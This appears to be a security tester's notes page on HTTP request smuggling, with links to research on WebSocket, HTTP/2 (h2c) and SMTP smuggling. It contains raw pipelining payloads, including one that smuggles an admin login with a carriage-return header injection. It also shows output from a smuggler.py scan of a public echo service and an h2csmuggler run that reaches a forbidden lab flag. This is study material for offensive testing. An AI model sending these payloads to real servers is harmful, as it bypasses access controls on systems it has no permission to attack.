Link to this headingRequest Smuggling

Using a Forward Proxy with two different backends it may be possible to chunk a single request just right so that the single request is split into two separate requests and are sent to different backends.

Use the Burp Plugin

More Examples:

Link to this headingPayloads

https://www.slideshare.net/SoroushDalili/waf-bypass-techniques-using-http-standard-and-web-servers-behaviour
Example python Pipelining code

Simple Pipelining Example:

GET /sum.jsp?a=1&b=1&c=2&d=2 HTTP/1.0 Host: example.com:8080 Connection: keep-alive POST /sum.jsp?a=5&b=5 HTTP/1.1 Host: example.com:8080 Content-Type application/x-www-form-urlencoded Content-Length: 7 c=6&d=6

Combined Pipelining Example:

POST /sum.jsp?a=5&b=5 HTTP/1.1 Host: example.com:8080 Content-Type application/x-www-form-urlencoded Content-Length: 7 c=2&d=2GET /sum.jsp?a=5&b=5&c=6&d=6 HTTP/1.0 Host: example.com:8080 Connection: keep-alive

Get with content length Pipelining Example:

GET /sum.jsp?a=5&b=5&c=6&d=6 HTTP/1.0 Host: example.com:8080 Content-Length: 10 1234567890POST /sum.jsp?a=5&b=5 %0DContent-Type application/x-www-form-urlencoded Host: example.com:8080 Content-Length: 30 user=admin&password=abc123

Link to this headingHTTP Smugling

Smuggler Script

Example:

python smuggler.py -u 'https://postman-echo.com/post?foo1=bar1&foo2=bar2' ______ _ / _____) | | ( (____ ____ _ _ ____ ____| | _____ ____ \____ \| \| | | |/ _ |/ _ | || ___ |/ ___) _____) ) | | | |_| ( (_| ( (_| | || ____| | (______/|_|_|_|____/ \___ |\___ |\_)_____)_| (_____(_____| @defparam v1.1 [+] URL : https://postman-echo.com/post?foo1=bar1&foo2=bar2 [+] Method : POST [+] Endpoint : /post?foo1=bar1&foo2=bar2 [+] Configfile : default.py [+] Timeout : 5.0 seconds [+] Cookies : 1 (Appending to the attack) [nameprefix1] : OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400) [tabprefix1] : OK (TECL: 0.09 - 501) (CLTE: 0.07 - 501) [tabprefix2] : OK (TECL: 0.07 - 400) (CLTE: 0.06 - 400) [space1] : OK (TECL: 0.07 - 400) (CLTE: 0.06 - 400) [midspace-01] : OK (TECL: 0.06 - 501) (CLTE: 0.07 - 501) [postspace-01] : OK (TECL: 0.08 - 400) (CLTE: 0.08 - 400) [prespace-01] : OK (TECL: 0.08 - 400) (CLTE: 0.06 - 400) [endspace-01] : OK (TECL: 0.08 - 501) (CLTE: 0.07 - 501) [xprespace-01] : OK (TECL: 0.07 - 400) (CLTE: 0.08 - 400) [endspacex-01] : OK (TECL: 0.07 - 501) (CLTE: 0.06 - 501) [rxprespace-01]: OK (TECL: 0.06 - 400) (CLTE: 0.07 - 400) [xnprespace-01]: OK (TECL: 0.07 - 400) (CLTE: 0.06 - 400) [endspacerx-01]: OK (TECL: 0.08 - 400) (CLTE: 0.06 - 400) [endspacexn-01]: OK (TECL: 0.07 - 501) (CLTE: 0.07 - 501) [midspace-04] : OK (TECL: 0.07 - 501) (CLTE: 0.08 - 501) [postspace-04] : OK (TECL: 0.08 - 400) (CLTE: 0.07 - 400) [prespace-04] : OK (TECL: 0.07 - 400) (CLTE: 0.08 - 400) [endspace-04] : OK (TECL: 0.06 - 501) (CLTE: 0.06 - 501) [xprespace-04] : OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400) [endspacex-04] : OK (TECL: 0.07 - 501) (CLTE: 0.06 - 501) [rxprespace-04]: OK (TECL: 0.07 - 400) (CLTE: 0.06 - 400) [xnprespace-04]: OK (TECL: 0.07 - 400) (CLTE: 0.08 - 400) [endspacerx-04]: OK (TECL: 0.06 - 400) (CLTE: 0.08 - 400) [endspacexn-04]: OK (TECL: 0.07 - 501) (CLTE: 0.07 - 501) [midspace-08] : OK (TECL: 0.06 - 501) (CLTE: 0.06 - 501) [postspace-08] : OK (TECL: 0.06 - 400) (CLTE: 0.07 - 400) [prespace-08] : OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400) [endspace-08] : OK (TECL: 0.06 - 501) (CLTE: 0.06 - 501) [xprespace-08] : OK (TECL: 0.07 - 400) (CLTE: 0.06 - 400) [endspacex-08] : OK (TECL: 0.07 - 501) (CLTE: 0.08 - 501) [rxprespace-08]: OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400) [xnprespace-08]: OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400) [endspacerx-08]: OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400) [endspacexn-08]: OK (TECL: 0.07 - 501) (CLTE: 0.06 - 501) [midspace-09] : OK (TECL: 0.06 - 501) (CLTE: 0.07 - 501) [postspace-09] : OK (TECL: 0.06 - 400) (CLTE: 0.06 - 400) [prespace-09] : OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400) [endspace-09] : OK (TECL: 0.08 - 501) (CLTE: 0.06 - 501) [xprespace-09] : OK (TECL: 0.07 - 200) (CLTE: 0.07 - 200) [endspacex-09] : OK (TECL: 0.07 - 501) (CLTE: 0.06 - 501) [rxprespace-09]: OK (TECL: 0.06 - 400) (CLTE: 0.07 - 400) [xnprespace-09]: OK (TECL: 0.07 - 200) (CLTE: 0.06 - 200) [endspacerx-09]: OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400) [endspacexn-09]: OK (TECL: 0.06 - 501) (CLTE: 0.08 - 501) [midspace-0a] : OK (TECL: 0.07 - 501) (CLTE: 0.06 - 501) [postspace-0a] : OK (TECL: 0.07 - 501) (CLTE: 0.07 - 501) [prespace-0a] : OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400) [endspace-0a] : OK (TECL: 0.08 - 400) (CLTE: 0.06 - 400) [xprespace-0a] : OK (TECL: 0.07 - 200) (CLTE: 0.07 - 200) [endspacex-0a] : OK (TECL: 0.07 - 200) (CLTE: 0.07 - 200) [rxprespace-0a]: OK (TECL: 0.07 - 200) (CLTE: 0.08 - 200) [xnprespace-0a]: OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400) [endspacerx-0a]: OK (TECL: 0.07 - 200) (CLTE: 0.07 - 200) [endspacexn-0a]: OK (TECL: 0.07 - 400) (CLTE: 0.06 - 400) [midspace-0b] : OK (TECL: 0.07 - 501) (CLTE: 0.06 - 501) [postspace-0b] : OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400) [prespace-0b] : OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400) [endspace-0b] : OK (TECL: 0.07 - 501) (CLTE: 0.07 - 501) [xprespace-0b] : OK (TECL: 0.07 - 400) (CLTE: 0.09 - 400) [endspacex-0b] : OK (TECL: 0.08 - 501) (CLTE: 0.07 - 501) [rxprespace-0b]: OK (TECL: 0.08 - 400) (CLTE: 0.06 - 400) [xnprespace-0b]: OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400) [endspacerx-0b]: OK (TECL: 0.07 - 400) (CLTE: 0.05 - 400) [endspacexn-0b]: OK (TECL: 0.07 - 501) (CLTE: 0.06 - 501) [midspace-0c] : OK (TECL: 0.08 - 501) (CLTE: 0.07 - 501) [postspace-0c] : OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400) [prespace-0c] : OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400) [endspace-0c] : OK (TECL: 0.07 - 501) (CLTE: 0.06 - 501) [xprespace-0c] : OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400) [endspacex-0c] : OK (TECL: 0.07 - 501) (CLTE: 0.07 - 501) [rxprespace-0c]: OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400) [xnprespace-0c]: OK (TECL: 0.07 - 400) (CLTE: 0.06 - 400) [endspacerx-0c]: OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400) [endspacexn-0c]: OK (TECL: 0.08 - 501) (CLTE: 0.07 - 501) [midspace-0d] : OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400) [postspace-0d] : OK (TECL: 0.06 - 400) (CLTE: 0.07 - 400) [prespace-0d] : OK (TECL: 0.08 - 400) (CLTE: 0.07 - 400) [endspace-0d] : OK (TECL: 0.07 - 200) (CLTE: 0.07 - 200) [xprespace-0d] : OK (TECL: 0.07 - 400) (CLTE: 0.06 - 400) [endspacex-0d] : OK (TECL: 0.07 - 400) (CLTE: 0.06 - 400) [rxprespace-0d]: OK (TECL: 0.08 - 400) (CLTE: 0.06 - 400) [xnprespace-0d]: OK (TECL: 0.07 - 200) (CLTE: 0.08 - 200) [endspacerx-0d]: OK (TECL: 0.08 - 400) (CLTE: 0.07 - 400) [endspacexn-0d]: OK (TECL: 0.08 - 200) (CLTE: 0.06 - 200) [midspace-1f] : OK (TECL: 0.07 - 501) (CLTE: 0.07 - 501) [postspace-1f] : OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400) [prespace-1f] : OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400) [endspace-1f] : OK (TECL: 0.08 - 501) (CLTE: 0.07 - 501) [xprespace-1f] : OK (TECL: 0.06 - 400) (CLTE: 0.07 - 400) [endspacex-1f] : OK (TECL: 0.07 - 501) (CLTE: 0.07 - 501) [rxprespace-1f]: OK (TECL: 0.06 - 400) (CLTE: 0.07 - 400) [xnprespace-1f]: OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400) [endspacerx-1f]: OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400) [endspacexn-1f]: OK (TECL: 0.08 - 501) (CLTE: 0.07 - 501) [midspace-20] : OK (TECL: 0.07 - 200) (CLTE: 0.08 - 200) [postspace-20] : OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400) [prespace-20] : OK (TECL: 0.08 - 400) (CLTE: 0.06 - 400) [endspace-20] : OK (TECL: 0.08 - 200) (CLTE: 0.07 - 200) [xprespace-20] : OK (TECL: 0.08 - 200) (CLTE: 0.07 - 200) [endspacex-20] : OK (TECL: 0.07 - 501) (CLTE: 0.07 - 501) [rxprespace-20]: OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400) [xnprespace-20]: OK (TECL: 0.07 - 200) (CLTE: 0.07 - 200) [endspacerx-20]: OK (TECL: 0.08 - 400) (CLTE: 0.08 - 400) [endspacexn-20]: OK (TECL: 0.07 - 200) (CLTE: 0.08 - 200) [midspace-7f] : OK (TECL: 0.08 - 501) (CLTE: 0.07 - 501) [postspace-7f] : OK (TECL: 0.07 - 400) (CLTE: 0.06 - 400) [prespace-7f] : OK (TECL: 0.06 - 400) (CLTE: 0.06 - 400) [endspace-7f] : OK (TECL: 0.07 - 501) (CLTE: 0.07 - 501) [xprespace-7f] : OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400) [endspacex-7f] : OK (TECL: 0.06 - 501) (CLTE: 0.08 - 501) [rxprespace-7f]: OK (TECL: 0.08 - 400) (CLTE: 0.07 - 400) [xnprespace-7f]: OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400) [endspacerx-7f]: OK (TECL: 0.07 - 400) (CLTE: 0.06 - 400) [endspacexn-7f]: OK (TECL: 0.06 - 501) (CLTE: 0.07 - 501) [midspace-a0] : OK (TECL: 0.07 - 501) (CLTE: 0.07 - 501) [postspace-a0] : OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400) [prespace-a0] : OK (TECL: 0.09 - 400) (CLTE: 0.07 - 400) [endspace-a0] : OK (TECL: 0.07 - 501) (CLTE: 0.07 - 501) [xprespace-a0] : OK (TECL: 0.07 - 200) (CLTE: 0.07 - 200) [endspacex-a0] : OK (TECL: 0.08 - 501) (CLTE: 0.07 - 501) [rxprespace-a0]: OK (TECL: 0.06 - 400) (CLTE: 0.08 - 400) [xnprespace-a0]: OK (TECL: 0.07 - 200) (CLTE: 0.08 - 200) [endspacerx-a0]: OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400) [endspacexn-a0]: OK (TECL: 0.07 - 501) (CLTE: 0.07 - 501) [midspace-ff] : OK (TECL: 0.07 - 501) (CLTE: 0.07 - 501) [postspace-ff] : OK (TECL: 0.08 - 400) (CLTE: 0.07 - 400) [prespace-ff] : OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400) [endspace-ff] : OK (TECL: 0.07 - 501) (CLTE: 0.07 - 501) [xprespace-ff] : OK (TECL: 0.07 - 200) (CLTE: 0.07 - 200) [endspacex-ff] : OK (TECL: 0.07 - 501) (CLTE: 0.07 - 501) [rxprespace-ff]: OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400) [xnprespace-ff]: OK (TECL: 0.07 - 200) (CLTE: 0.07 - 200) [endspacerx-ff]: OK (TECL: 0.07 - 400) (CLTE: 0.08 - 400) [endspacexn-ff]: OK (TECL: 0.07 - 501) (CLTE: 0.07 - 501)

Link to this headingHitting other services

https://medium.com/@ricardoiramar/the-powerful-http-request-smuggling-af208fafa142

Link to this headingWebSocket Smuggling

https://github.com/0ang3el/websocket-smuggle

Link to this headingHTTP/2 Request Smuggling

https://blog.assetnote.io/2021/03/18/h2c-smuggling/
https://labs.bishopfox.com/tech-blog/h2c-smuggling-request-smuggling-via-http/2-cleartext-h2c

Initial Request to Endpoints:

>>> curl -ik https://localhost:8001/flag HTTP/1.1 403 Forbidden content-length: 93 cache-control: no-cache content-type: text/html <html><body><h1>403 Forbidden</h1> Request forbidden by administrative rules. </body></html>

H2C Script:

>>> /h2csmuggler.py -x https://localhost:8001 http://backend/flag [INFO] h2c stream established successfully. :status: 200 content-type: text/plain; charset=utf-8 content-length: 20 date: Mon, 05 Apr 2021 18:04:54 GMT Hello, /, http: true [INFO] Requesting - /flag :status: 200 content-type: text/plain; charset=utf-8 content-length: 17 date: Mon, 05 Apr 2021 18:04:54 GMT You got the flag!

Link to this headingSMTP Smuggling

https://www.redpacketsecurity.com/smtp-smuggling-new-flaw-lets-attackers-bypass-security-and-spoof-emails/